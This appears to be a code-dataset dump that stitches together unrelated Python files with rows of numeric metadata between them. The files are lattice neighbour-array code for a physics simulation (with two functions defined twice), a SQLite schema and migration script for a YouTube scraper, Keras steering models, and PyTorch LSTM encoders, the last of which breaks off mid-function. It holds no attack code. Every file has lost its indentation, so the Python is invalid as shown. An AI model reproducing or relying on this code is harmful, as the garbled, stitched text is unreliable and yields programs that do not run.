return coor
#Disk with a hole, inner radius r, outer radius R
def donut(R, r):
CAx = []
CAy = []
xmin = -R #Radius of disk
ymin = -R
for j in range(int(2*R) + 1):
for i in range(int(2*R) + 1):
x = xmin + i
y = ymin + j
#decide if x,y is inside shape
r_ij = sqrt(x**2 + y**2)
if r_ij < R and r_ij >= r:
CAx.append(i)
CAy.append(j)
coor_arr = np.zeros((len(CAx), 2))
coor_arr[:, 0] = CAx
coor_arr[:, 1] = CAy
return coor_arr
def halfdisk(R):
CAx = []
CAy = []
xmin = -R
ymin = -R
for j in range(2*R + 1):
for i in range(2*R + 1):
x = xmin + i
y = ymin + j
if(x < 0 or sqrt(x**2+y**2) > R):
continue
else:
CAx.append(i)
CAy.append(j)
coor_arr = np.zeros((len(CAx), 2))
coor_arr[:, 0] = CAx
coor_arr[:, 1] = CAy
return coor_arr
def ibeam(xbase, xcut, y1, y2):
CAx = []
CAy = []
ybase = int(2*y1+y2)
for j in range(ybase+1):
for i in range(xbase+1):
if (j > y1 and j < y1+y2) and (i < xcut or i > xbase - xcut):
continue
else:
CAx.append(i)
CAy.append(j)
coor_arr = np.zeros((len(CAx), 2))
coor_arr[:, 0] = CAx
coor_arr[:, 1] = CAy
return coor_arr
def cross(x1, x2, y1, y2):
CAx = []
CAy = []
xbase = int(x1 + 2*x2)
ybase = int(y1 + 2*y2)
for j in range(ybase+1):
for i in range(xbase+1):
if (i < x2 and (j < y2 or j > y2+y1)) or (i > x1+x2 and (j < y2 or j > y2+y1)):
continue
else:
CAx.append(i)
CAy.append(j)
coor_arr = np.zeros((len(CAx), 2))
coor_arr[:, 0] = CAx
coor_arr[:, 1] = CAy
return coor_arr
""" Neighbor Arrays:
These neighbor arrays are implemented in such a way as to avoid double looping. This saves a significant ammount of time in large unit cells, as can be tested in the majoranaJJ/time_tsts/[bound_arr, nbr_arr]
Defining nearest neighbor array
NN_arr is Nx4, the columns store the index of the 4 nearest neighbors for each
lattice site
Left: NN[n,0] = n-1
Above: NN[n,1] = n+Nx
Right: NN[n, 2] = n+1
Down NN[n, 3] = n-Nx
if there is no lattice site in nearest neighbor spot, value is -1
"""
def NN_Arr(coor):
N = coor.shape[0]
NN = -1*ones((N,4), dtype = 'int')
xmax = max(coor[:, 0])
ymax = max(coor[:, 1])
Lx = xmax + 1
Ly = ymax + 1
for i in range(N):
xi = coor[i, 0]
yi = coor[i, 1]
if (i-1) >= 0 and abs(xi - 1) >= 0 and abs(xi - coor[i-1, 0]) == 1 and abs(yi - coor[i-1, 1]) == 0:
NN[i, 0] = i - 1
if (i+1) < N and abs(xi + 1) <= xmax and abs(xi - coor[i+1, 0]) == 1 and abs(yi - coor[i+1, 1]) == 0:
NN[i, 2] = i + 1
for j in range(0, int(Lx)+1):
if (i + j) < N and abs(yi + 1) <= ymax and abs(yi - coor[int(i + j), 1]) == 1 and abs(xi - coor[int(i + j), 0]) == 0:
NN[i, 1] = i + j
if (i - j) >= 0 and abs(yi - 1) >= 0 and abs(yi - coor[int(i - j), 1]) == 1 and abs(xi - coor[int(i - j), 0]) == 0:
NN[i, 3]= i - j
return NN
""" Periodic Boundary conditions
if statements:
if the x-coordinate of the ith lattice site is the minimum value, it must be on the edge of the unit cell and therefore has a nearest neighbor in the neighboring unit cell.
Ex: To find the lattice site that corresponds to the neighbor to the left in the neighboring unit cell, we know it will be at most the (i + xmax)th site. If we are given a perfect square, it is the (i+ xmax)th site. In the case of the donut, this is not the case, so we until we find the site that is at the same height as the ith site, and has an x-coordinate that is the maximum value. The other statements follow similar logic for other neighbors.
"""
def Bound_Arr(coor):
xmin = int(min(coor[:, 0]))
ymin = int(min(coor[:, 1]))
xmax = int(max(coor[:, 0]))
ymax = int(max(coor[:, 1]))
N = coor.shape[0]
NNb = -1*ones((N,4), dtype = 'int') #stores the values of the coordinates of each periodic neighbor, -1 means no neighbor
for i in range(N):
x_index = coor[i, 0]
y_index = coor[i, 1]
if x_index == xmin:
for j in range(i, N):
y = coor[j, 1]
x = coor[j, 0]
if y == y_index and x == xmax:
NNb[i, 0] = j
break
if y_index == ymax:
for j in range(0, int(coor[i, 0]) + 1):
x = coor[j, 0]
y = coor[j, 1]
if x == x_index and y == ymin:
NNb[i, 1] = j
break
if x_index == xmax:
for j in range(i, -1, -1):
x = coor[j, 0]
y = coor[j, 1]
if y == y_index and x == xmin:
NNb[i, 2] = j
break
if y_index == ymin:
for j in range(N-1, int(coor[i, 0]), -1):
x = coor[j, 0]
y = coor[j, 1]
if x == x_index and y == ymax:
NNb[i, 3] = j
break
return NNb
from numpy import ones
""" Neighbor Arrays:
These neighbor arrays are implemented in such a way as to avoid double looping. This saves a significant ammount of time in large unit cells, as can be tested in the majoranaJJ/time_tsts/[bound_arr, nbr_arr]
Defining nearest neighbor array
NN_arr is Nx4, the columns store the index of the 4 nearest neighbors for each
lattice site
Left: NN[n,0] = n-1
Above: NN[n,1] = n+Nx
Right: NN[n, 2] = n+1
Down NN[n, 3] = n-Nx
if there is no lattice site in nearest neighbor spot, value is -1
"""
def NN_Arr(coor):
N = coor.shape[0]
NN = -1*ones((N,4), dtype = 'int')
xmax = max(coor[:, 0])
ymax = max(coor[:, 1])
Lx = int(xmax + 1)
Ly = int(ymax + 1)
for i in range(N):
xi = coor[i, 0]
yi = coor[i, 1]
if (i-1) >= 0:
if (xi - coor[i-1, 0]) == 1 and (yi - coor[i-1, 1]) == 0:
NN[i, 0] = i-1
if (i+1) < N:
if (xi - coor[i+1, 0]) == -1 and (yi - coor[i+1, 1]) == 0:
NN[i, 2] = i+1
for j in range(0, Lx+1):
if (i+j) < N:
if (yi - coor[i+j, 1]) == -1 and (xi - coor[i+j, 0]) == 0:
NN[i, 1] = i+j
if (i-j) >= 0:
if (yi - coor[i-j, 1]) == 1 and (xi - coor[i-j, 0]) == 0:
NN[i, 3]= i-j
return NN
def NN_sqr(coor):
N = coor.shape[0]
NN = -1*ones((N,4), dtype = 'int')
xmax = max(coor[:, 0])
ymax = max(coor[:, 1])
Lx = int(xmax + 1)
Ly = int(ymax + 1)
for i in range(N):
xi = coor[i, 0]
yi = coor[i, 1]
if (i-1) >= 0 and (xi - coor[i-1, 0]) == 1:
NN[i, 0] = i-1
if (i+Lx) < N and (yi - coor[i+Lx, 1]) == -1:
NN[i, 1] = i+Lx
if (i+1) < N and (xi - coor[i+1, 0]) == -1:
NN[i, 2] = i+1
if (i-Lx) >= 0 and (yi - coor[i-Lx, 1]) == 1:
NN[i, 3] = i-Lx
return NN
""" Periodic Boundary conditions
if statements:
if the x-coordinate of the ith lattice site is the minimum value, it must be on the edge of the unit cell and therefore has a nearest neighbor in the neighboring unit cell to the left which is equivalent to the right most site of the same y-value.
Ex: To find the lattice site that corresponds to the neighbor to the left in the neighboring unit cell, we know it will be at most the (i + xmax)th site. If we are given a perfect square, it is the (i+ xmax)th site. In the case of the donut, this is not the case, so we until we find the site that is at the same height as the ith site, and has an x-coordinate that is the maximum value. The other statements follow similar logic for other neighbors.
"""
def Bound_Arr(coor):
xmin = int(min(coor[:, 0]))
ymin = int(min(coor[:, 1]))
xmax = int(max(coor[:, 0]))
ymax = int(max(coor[:, 1]))
N = coor.shape[0]
NNb = -1*ones((N,4), dtype = 'int') #stores the values of the coordinates of each periodic neighbor, -1 means no neighbor
for i in range(N):
x_index = coor[i, 0]
y_index = coor[i, 1]
if x_index == xmin:
for j in range(i, N):
y = coor[j, 1]
x = coor[j, 0]
if y == y_index and x == xmax:
NNb[i, 0] = j
break
if y_index == ymax:
for j in range(0, int(coor[i, 0]) + 1):
x = coor[j, 0]
y = coor[j, 1]
if x == x_index and y == ymin:
NNb[i, 1] = j
break
if x_index == xmax:
for j in range(i, -1, -1):
x = coor[j, 0]
y = coor[j, 1]
if y == y_index and x == xmin:
NNb[i, 2] = j
break
if y_index == ymin:
for j in range(N-1, int(coor[i, 0]), -1):
x = coor[j, 0]
y = coor[j, 1]
if x == x_index and y == ymax:
NNb[i, 3] = j
break
return NNb
| 34.534483
| 450
| 0.473889
| 1,651
| 10,015
| 2.843125
| 0.104179
| 0.014487
| 0.019173
| 0.035151
| 0.893907
| 0.88006
| 0.867916
| 0.860673
| 0.854282
| 0.83447
| 0
| 0.0419
| 0.394708
| 10,015
| 289
| 451
| 34.653979
| 0.732432
| 0.027059
| 0
| 0.763636
| 0
| 0
| 0.002056
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.045455
| false
| 0
| 0.013636
| 0
| 0.109091
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6f8ee6861407b8a461192395688c62f6e14e2015
| 7,422
|
py
|
Python
|
src/create_new.py
|
quartztester/Youtube_Scraper
|
8f463e795cc7cce9896dd52994b39ecf3a2bebcd
|
[
"MIT"
] | null | null | null |
src/create_new.py
|
quartztester/Youtube_Scraper
|
8f463e795cc7cce9896dd52994b39ecf3a2bebcd
|
[
"MIT"
] | null | null | null |
src/create_new.py
|
quartztester/Youtube_Scraper
|
8f463e795cc7cce9896dd52994b39ecf3a2bebcd
|
[
"MIT"
] | null | null | null |
import sqlite3
import os
def create_new():
conn = sqlite3.connect('youtube.db')
cur = conn.cursor()
cur.execute("""CREATE TABLE IF NOT EXISTS tb_channels (
Channel_ID TEXT PRIMARY KEY,
Channel_title TEXT,
Published_At TEXT NOT NULL,
Country TEXT,
View_Count INTEGER,
Subscriber_Count INTEGER,
Video_Count INTEGER,
Playlist_Count INTEGER,
Channel_Duration INTEGER,
Duration_in_Text TEXT,
Is_Deleted INTEGER,
Deleted_Videos INTEGER,
Downloaded_Videos INTEGER,
Folder_Size_GB REAL,
Channel_last_Scraped TEXT,
Auto_Update INTEGER,
Description TEXT
)
""")
cur.execute("""CREATE TABLE IF NOT EXISTS tb_error (
Channel_ID TEXT NOT NULL
)
""")
cur.execute("""CREATE TABLE IF NOT EXISTS tb_playlists(
Playlist_ID TEXT PRIMARY KEY,
Playlist_title TEXT,
Channel_ID TEXT NOT NULL,
Channel_Title TEXT NOT NULL,
Published_At TEXT NOT NULL,
Current_Video_Count INTEGER,
Playlist_Seconds INTEGER,
Playlist_Duration TEXT,
Is_Seen INTEGER,
Worth INTEGER,
Is_Removed INTEGER,
Deleted_Videos INTEGER,
Downloaded_Videos INTEGER,
Folder_Size_GB REAL,
Playlist_last_Scraped TEXT,
Auto_Update INTEGER
)
""")
cur.execute("""CREATE TABLE IF NOT EXISTS tb_videos (
Video_ID TEXT PRIMARY KEY,
Video_title TEXT,
Is_Seen INTEGER,
Worth INTEGER,
Upload_playlistId TEXT,
Playlist_ID TEXT,
Published_At TEXT NOT NULL,
epoch REAL NOT NULL,
Channel_ID TEXT NOT NULL,
Channel_Title TEXT NOT NULL,
View_Count INTEGER,
Like_Count INTEGER,
Dislike_Count INTEGER,
Upvote_Ratio REAL,
Comment_Count INTEGER,
Duration TEXT,
video_seconds INTEGER,
Is_Licensed INTEGER,
Is_Deleted INTEGER,
Is_Downloaded INTEGER
)
""")
cur.execute("""CREATE TABLE IF NOT EXISTS video_history (
Video_ID TEXT NOT NULL,
Title TEXT,
Watched_at TEXT ,
epoch REAL NOT NULL,
Is_in_Main INTEGER,
Is_Deleted INTEGER,
PRIMARY KEY ( Video_ID, epoch)
)
""")
cur.execute("""CREATE TABLE IF NOT EXISTS yt_downloaded (
Video_ID TEXT PRIMARY KEY,
Resolution TEXT,
Raw_Size INTEGER,
Size REAL,
vid_type TEXT,
FPS TEXT,
bitrate,
Audio_Type TEXT,
Frequency INTEGER,
Channels TEXT,
Is_In_Main INTEGER
)
""")
conn.commit() # Push the data into database
conn.close()
def migrate():
conn = sqlite3.connect('youtube.db')
cur = conn.cursor()
cur.execute("PRAGMA foreign_keys=off")
cur.execute("BEGIN TRANSACTION")
cur.execute("ALTER TABLE tb_channels RENAME TO _tb_channels_old")
cur.execute("""
CREATE TABLE IF NOT EXISTS tb_channels (
Channel_ID TEXT PRIMARY KEY,
Channel_title TEXT,
Published_At TEXT NOT NULL,
Country TEXT,
View_Count INTEGER,
Subscriber_Count INTEGER,
Video_Count INTEGER,
Playlist_Count INTEGER
)
""")
cur.execute("INSERT INTO tb_channels SELECT * FROM _tb_channels_old")
try:
cur.execute("ALTER TABLE tb_channels ADD COLUMN Channel_Duration INTEGER")
cur.execute("ALTER TABLE tb_channels ADD COLUMN Duration_in_Text TEXT")
cur.execute("ALTER TABLE tb_channels ADD COLUMN Is_Deleted INTEGER")
cur.execute("ALTER TABLE tb_channels ADD COLUMN Deleted_Videos INTEGER")
cur.execute("ALTER TABLE tb_channels ADD COLUMN Downloaded_Videos INTEGER")
cur.execute("ALTER TABLE tb_channels ADD COLUMN Folder_Size_GB REAL")
cur.execute("ALTER TABLE tb_channels ADD COLUMN Channel_last_Scraped TEXT")
cur.execute("ALTER TABLE tb_channels ADD COLUMN Auto_Update INTEGER")
cur.execute("ALTER TABLE tb_channels ADD COLUMN Description TEXT")
except:
# These stats are added after intitial release of this code.
pass
cur.execute("DROP TABLE _tb_channels_old")
cur.execute("ALTER TABLE tb_playlists RENAME TO _tb_playlists_old")
cur.execute("""CREATE TABLE IF NOT EXISTS tb_playlists(
Playlist_ID TEXT PRIMARY KEY,
Playlist_title TEXT,
Channel_ID TEXT NOT NULL,
Channel_Title TEXT NOT NULL,
Published_At TEXT NOT NULL,
Item_Count INTEGER,
Playlist_Seconds INTEGER,
Playlist_Duration TEXT,
Is_Seen INTEGER,
Worth INTEGER
)
""")
cur.execute("INSERT INTO tb_playlists SELECT * FROM _tb_playlists_old")
try:
cur.execute("ALTER TABLE tb_playlists ADD COLUMN Is_Removed INTEGER")
cur.execute("ALTER TABLE tb_playlists ADD COLUMN Deleted_Videos INTEGER")
cur.execute("ALTER TABLE tb_playlists ADD COLUMN Downloaded_Videos INTEGER")
cur.execute("ALTER TABLE tb_playlists ADD COLUMN Folder_Size_GB REAL")
cur.execute("ALTER TABLE tb_playlists ADD COLUMN Playlist_last_Scraped TEXT")
cur.execute("ALTER TABLE tb_playlists ADD COLUMN Auto_Update INTEGER")
cur.execute("ALTER TABLE tb_playlists RENAME COLUMN Item_Count TO Current_Video_Count")
except:
# These stats are added after intitial release of this code.
pass
cur.execute("DROP TABLE _tb_playlists_old")
cur.execute("ALTER TABLE tb_videos RENAME TO _tb_videos_old")
cur.execute("""CREATE TABLE IF NOT EXISTS tb_videos (
Video_ID TEXT PRIMARY KEY,
Video_title TEXT,
Is_Seen INTEGER,
Worth INTEGER,
Upload_playlistId TEXT,
Playlist_ID TEXT,
Published_At TEXT NOT NULL,
epoch REAL NOT NULL,
Channel_ID TEXT NOT NULL,
Channel_Title TEXT NOT NULL,
View_Count INTEGER,
Like_Count INTEGER,
Dislike_Count INTEGER,
Upvote_Ratio REAL,
Comment_Count INTEGER,
Duration TEXT,
video_seconds INTEGER,
Is_Licensed INTEGER,
Is_Deleted INTEGER,
Is_Downloaded INTEGER
)
""")
cur.execute("INSERT INTO tb_videos SELECT * FROM _tb_videos_old")
cur.execute("DROP TABLE _tb_videos_old")
cur.execute("""CREATE TABLE IF NOT EXISTS yt_downloaded (
Video_ID TEXT PRIMARY KEY,
Resolution TEXT,
Raw_Size INTEGER,
Size REAL,
vid_type TEXT,
FPS TEXT,
bitrate,
Audio_Type TEXT,
Frequency INTEGER,
Channels TEXT,
Is_In_Main INTEGER
)
""")
try:
cur.execute("DROP TABLE tb_downloaded")
except:
pass
cur.execute("PRAGMA foreign_keys=on")
conn.commit() # Push the data into database
conn.close()
def dbase():
if not os.path.exists("youtube.db"):
create_new()
else:
conn = sqlite3.connect('youtube.db')
cur = conn.cursor()
try:
cur.execute("SELECT Deleted_Videos FROM tb_channels")
except:
migrate()
if __name__ == "__main__":
dbase()
| 30.925
| 95
| 0.625842
| 890
| 7,422
| 4.993258
| 0.135955
| 0.090009
| 0.064131
| 0.085509
| 0.856661
| 0.822232
| 0.783753
| 0.769352
| 0.720297
| 0.654815
| 0
| 0.000782
| 0.311237
| 7,422
| 239
| 96
| 31.054393
| 0.868545
| 0.023309
| 0
| 0.649533
| 0
| 0
| 0.768084
| 0.005798
| 0
| 0
| 0
| 0
| 0
| 1
| 0.014019
| false
| 0.014019
| 0.009346
| 0
| 0.023364
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6fcc1cf6f6cba7300e13b2a85e6a1b53a5c40aef
| 5,062
|
py
|
Python
|
scripts/models.py
|
tabris2015/robocar
|
602fcc8fb111b3c21111fef57ace467b80f86d9f
|
[
"MIT"
] | 1
|
2018-04-28T21:44:07.000Z
|
2018-04-28T21:44:07.000Z
|
scripts/models.py
|
tabris2015/robocar
|
602fcc8fb111b3c21111fef57ace467b80f86d9f
|
[
"MIT"
] | null | null | null |
scripts/models.py
|
tabris2015/robocar
|
602fcc8fb111b3c21111fef57ace467b80f86d9f
|
[
"MIT"
] | null | null | null |
from keras.models import model_from_json
import numpy as np
import tensorflow as tf
from keras.models import Sequential
from keras.models import Model
from keras.layers import Input, Dense, Dropout, Flatten
from keras.layers import Conv2D, MaxPooling2D, BatchNormalization
from keras.layers import Activation
from keras import backend as K
def base(input_shape):
model = Sequential()
model.add(Conv2D(64, kernel_size=(3, 3), activation='relu', input_shape=input_shape))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.25))
model.add(Conv2D(32, (3, 3), activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.25))
model.add(Conv2D(16, (3, 3), activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.25))
model.add(Flatten())
model.add(Dense(32, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(12, activation='relu'))
model.add(Dense(1, activation='tanh'))
model.compile(loss='mean_squared_error', optimizer='adam', metrics=['accuracy'])
return model
def conv1(input_shape):
model = Sequential()
model.add(Conv2D(3, kernel_size=(1, 1), activation='relu', input_shape=input_shape))
model.add(Conv2D(8, (3, 3), activation='relu'))
model.add(Conv2D(16, (3, 3), activation='relu'))
model.add(Conv2D(32, (3, 3), activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.25))
model.add(Flatten())
model.add(Dense(32, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(12, activation='relu'))
model.add(Dense(1, activation='tanh'))
model.compile(loss='mean_squared_error', optimizer='adam', metrics=['accuracy'])
return model
def conv2(input_shape):
model = Sequential()
model.add(Conv2D(8, kernel_size=(5, 5), input_shape=input_shape))
model.add(BatchNormalization())
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Conv2D(16, (3, 3)))
model.add(BatchNormalization())
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Conv2D(32, (3, 3)))
model.add(BatchNormalization())
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Conv2D(64, (2, 2)))
model.add(BatchNormalization())
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Conv2D(128, (1, 1)))
model.add(BatchNormalization())
model.add(Activation('relu'))
model.add(Dropout(0.25))
model.add(Flatten())
model.add(Dense(32, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(16, activation='relu'))
model.add(Dense(1, activation='tanh'))
model.compile(loss='mean_squared_error', optimizer='adam', metrics=['accuracy'])
return model
def custom_loss(y_true, y_pred):
loss = tf.square(y_true - y_pred)
loss = .5 * tf.reduce_mean(loss)
return loss
def simple1(input_shape):
# this network is used with a 80 x 160 image size
# Construct the network
image_inp = Input(shape=input_shape)
x = Conv2D(filters=16, kernel_size=(3, 5), activation='relu', padding='valid')(image_inp)
x = Conv2D(filters=16, kernel_size=(3, 5), activation='relu', padding='valid')(x)
x = MaxPooling2D((4, 2))(x)
x = Conv2D(filters=32, kernel_size=(3, 5), activation='relu', padding='valid')(x)
x = Conv2D(filters=32, kernel_size=(3, 5), activation='relu', padding='valid')(x)
x = MaxPooling2D((4, 2))(x)
x = Conv2D(filters=4, kernel_size=(1, 1), activation='linear', padding='same')(x)
x = Flatten()(x)
x = Dense(1, activation='tanh', kernel_regularizer='l1')(x)
angle_out = x
model = Model(inputs=[image_inp], outputs=[angle_out])
model.compile(loss=custom_loss, optimizer='adam', metrics=['accuracy'])
return model
def simple2(input_shape):
# this network is used with a 80 x 160 image size
# Construct the network
image_inp = Input(shape=input_shape)
x = Conv2D(filters=16, kernel_size=(3, 5), activation='relu', padding='valid')(image_inp)
x = Conv2D(filters=16, kernel_size=(3, 5), activation='relu', padding='valid')(x)
x = MaxPooling2D((4, 2))(x)
x = Conv2D(filters=32, kernel_size=(3, 5), activation='relu', padding='valid')(x)
x = Conv2D(filters=32, kernel_size=(3, 5), activation='relu', padding='valid')(x)
x = MaxPooling2D((4, 2))(x)
x = Conv2D(filters=64, kernel_size=(3, 5), activation='relu', padding='valid')(x)
x = Conv2D(filters=64, kernel_size=(3, 5), activation='relu', padding='valid')(x)
x = MaxPooling2D((4, 2))(x)
x = Conv2D(filters=4, kernel_size=(1, 1), activation='linear', padding='same')(x)
x = Flatten()(x)
x = Dense(1, activation='tanh', kernel_regularizer='l1')(x)
angle_out = x
model = Model(inputs=[image_inp], outputs=[angle_out])
model.compile(loss=custom_loss, optimizer='adam', metrics=['accuracy'])
return model
| 33.746667
| 93
| 0.661596
| 724
| 5,062
| 4.537293
| 0.122928
| 0.121766
| 0.092542
| 0.107154
| 0.89376
| 0.881583
| 0.856012
| 0.814612
| 0.791476
| 0.776865
| 0
| 0.050071
| 0.163572
| 5,062
| 150
| 94
| 33.746667
| 0.725791
| 0.028052
| 0
| 0.75
| 0
| 0
| 0.065107
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.055556
| false
| 0
| 0.083333
| 0
| 0.194444
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6fff630173a07f4d16a10e2758779ff76a57f87e
| 12,318
|
py
|
Python
|
model/encoder.py
|
sahara2001/editsql
|
d4325ac996d1ed0069def6d349e43e2a1914e761
|
[
"MIT"
] | null | null | null |
model/encoder.py
|
sahara2001/editsql
|
d4325ac996d1ed0069def6d349e43e2a1914e761
|
[
"MIT"
] | null | null | null |
model/encoder.py
|
sahara2001/editsql
|
d4325ac996d1ed0069def6d349e43e2a1914e761
|
[
"MIT"
] | null | null | null |
""" Contains code for encoding an input sequence. """
import torch
import torch.nn.functional as F
from .torch_utils import create_multilayer_lstm_params, encode_sequence,encode_sequence_bert
from .gated_graph_conv import GatedGraphConv
class Encoder(torch.nn.Module):
""" Encodes an input sequence. """
def __init__(self, num_layers, input_size, state_size):
super().__init__()
self.num_layers = num_layers
self.forward_lstms = create_multilayer_lstm_params(self.num_layers, input_size, state_size / 2, "LSTM-ef")
self.backward_lstms = create_multilayer_lstm_params(self.num_layers, input_size, state_size / 2, "LSTM-eb")
def forward(self, sequence, embedder, dropout_amount=0.):
""" Encodes a sequence forward and backward.
Inputs:
forward_seq (list of str): The string forwards.
backward_seq (list of str): The string backwards.
f_rnns (list of dy.RNNBuilder): The forward RNNs.
b_rnns (list of dy.RNNBuilder): The backward RNNS.
emb_fn (dict str->dy.Expression): Embedding function for tokens in the
sequence.
size (int): The size of the RNNs.
dropout_amount (float, optional): The amount of dropout to apply.
Returns:
(list of dy.Expression, list of dy.Expression), list of dy.Expression,
where the first pair is the (final cell memories, final cell states) of
all layers, and the second list is a list of the final layer's cell
state for all tokens in the sequence.
"""
forward_state, forward_outputs = encode_sequence(
sequence,
self.forward_lstms,
embedder,
dropout_amount=dropout_amount)
backward_state, backward_outputs = encode_sequence(
sequence[::-1],
self.backward_lstms,
embedder,
dropout_amount=dropout_amount)
cell_memories = []
hidden_states = []
for i in range(self.num_layers):
cell_memories.append(torch.cat([forward_state[0][i], backward_state[0][i]], dim=0))
hidden_states.append(torch.cat([forward_state[1][i], backward_state[1][i]], dim=0))
assert len(forward_outputs) == len(backward_outputs)
backward_outputs = backward_outputs[::-1]
final_outputs = []
for i in range(len(sequence)):
final_outputs.append(torch.cat([forward_outputs[i], backward_outputs[i]], dim=0))
return (cell_memories, hidden_states), final_outputs
#
class SchemaEncoder1(torch.nn.Module):
"""
Encodes an input sequence with
#TODO: graph encoding
"""
def __init__(self, num_layers, input_size, state_size):
super().__init__()
self.num_layers = num_layers
self.forward_lstms = create_multilayer_lstm_params(self.num_layers, input_size, state_size / 2, "LSTM-ef")
self.backward_lstms = create_multilayer_lstm_params(self.num_layers, input_size, state_size / 2, "LSTM-eb")
def forward(self, sequence, embedder, dropout_amount=0.):
""" Encodes a sequence forward and backward.
Inputs:
forward_seq (list of str): The string forwards.
backward_seq (list of str): The string backwards.
f_rnns (list of dy.RNNBuilder): The forward RNNs.
b_rnns (list of dy.RNNBuilder): The backward RNNS.
emb_fn (dict str->dy.Expression): Embedding function for tokens in the
sequence.
size (int): The size of the RNNs.
dropout_amount (float, optional): The amount of dropout to apply.
Returns:
(list of dy.Expression, list of dy.Expression), list of dy.Expression,
where the first pair is the (final cell memories, final cell states) of
all layers, and the second list is a list of the final layer's cell
state for all tokens in the sequence.
"""
forward_state, forward_outputs = encode_sequence(
sequence,
self.forward_lstms,
embedder,
dropout_amount=dropout_amount)
backward_state, backward_outputs = encode_sequence(
sequence[::-1],
self.backward_lstms,
embedder,
dropout_amount=dropout_amount)
cell_memories = []
hidden_states = []
for i in range(self.num_layers):
cell_memories.append(torch.cat([forward_state[0][i], backward_state[0][i]], dim=0))
hidden_states.append(torch.cat([forward_state[1][i], backward_state[1][i]], dim=0))
assert len(forward_outputs) == len(backward_outputs)
backward_outputs = backward_outputs[::-1]
final_outputs = []
for i in range(len(sequence)):
final_outputs.append(torch.cat([forward_outputs[i], backward_outputs[i]], dim=0))
return (cell_memories, hidden_states), final_outputs
class Encoder_Gnn(torch.nn.Module):
""" Encodes an input sequence. """
def __init__(self, num_layers, input_size, state_size):
super().__init__()
self.num_layers = num_layers
self.forward_lstms = create_multilayer_lstm_params(self.num_layers, input_size, state_size / 2, "LSTM-ef")
self.backward_lstms = create_multilayer_lstm_params(self.num_layers, input_size, state_size / 2, "LSTM-eb")
self.l1 = torch.nn.Linear(768,int(input_size))
def forward(self, last_hidden, dropout_amount=0.):
""" Encodes a sequence forward and backward.
10/12 - Add Bert Utterance embedding
Inputs:
last_hidden (hidden states from bert):
dropout_amount (float, optional): The amount of dropout to apply.
Returns:
(list of dy.Expression, list of dy.Expression), list of dy.Expression,
where the first pair is the (final cell memories, final cell states) of
all layers, and the second list is a list of the final layer's cell
state for all tokens in the sequence.
"""
# print(sequence, len(sequence))
# bert utterance encoding
forward_state = None
forward_outputs = None
backward_state = None
backward_outputs = None
cell_memories = []
hidden_states = []
last_hidden = [last_hidden[:,i,:].squeeze() for i in range(last_hidden.size()[1])] # size [batch=1, q_len, hidden ]
forward_state, forward_outputs = encode_sequence_bert(
last_hidden,
self.forward_lstms,
dropout_amount=dropout_amount)
# print(forward_state[0][0].size(),forward_state[1][0].size())
backward_state, backward_outputs = encode_sequence_bert(
last_hidden[::-1],
self.backward_lstms,
dropout_amount=dropout_amount)
# cell_memories = []
# hidden_states = []
for i in range(self.num_layers):
cell_memories.append(torch.cat([forward_state[0][i], backward_state[0][i]], dim=0))
hidden_states.append(torch.cat([forward_state[1][i], backward_state[1][i]], dim=0))
assert len(forward_outputs) == len(backward_outputs)
backward_outputs = backward_outputs[::-1]
final_outputs = []
for i in range(len(last_hidden)):
final_outputs.append(torch.cat([forward_outputs[i], backward_outputs[i]], dim=0))
return (cell_memories, hidden_states), final_outputs
class Encoder_Bert(torch.nn.Module):
""" Encodes an input sequence. """
def __init__(self, num_layers, input_size, state_size, from_pretrained=False, pretrained_weights='bert-base-uncased'):
super().__init__()
self.num_layers = num_layers
self.forward_lstms = create_multilayer_lstm_params(self.num_layers, input_size, state_size / 2, "LSTM-ef")
self.backward_lstms = create_multilayer_lstm_params(self.num_layers, input_size, state_size / 2, "LSTM-eb")
self.use_bert = from_pretrained
self.l1 = torch.nn.Linear(768,int(input_size))
if from_pretrained:
print('From pretrained')
self.bert_tokenizer = BertTokenizer.from_pretrained(pretrained_weights)
self.bert_model = BertModel.from_pretrained(pretrained_weights)
def forward(self, sequence, embedder, dropout_amount=0.):
""" Encodes a sequence forward and backward.
10/12 - Add Bert Utterance embedding
Inputs:
forward_seq (list of str): The string forwards.
backward_seq (list of str): The string backwards.
f_rnns (list of dy.RNNBuilder): The forward RNNs.
b_rnns (list of dy.RNNBuilder): The backward RNNS.
emb_fn (dict str->dy.Expression): Embedding function for tokens in the
sequence.
size (int): The size of the RNNs.
dropout_amount (float, optional): The amount of dropout to apply.
Returns:
(list of dy.Expression, list of dy.Expression), list of dy.Expression,
where the first pair is the (final cell memories, final cell states) of
all layers, and the second list is a list of the final layer's cell
state for all tokens in the sequence.
"""
# print(sequence, len(sequence))
# bert utterance encoding
forward_state = None
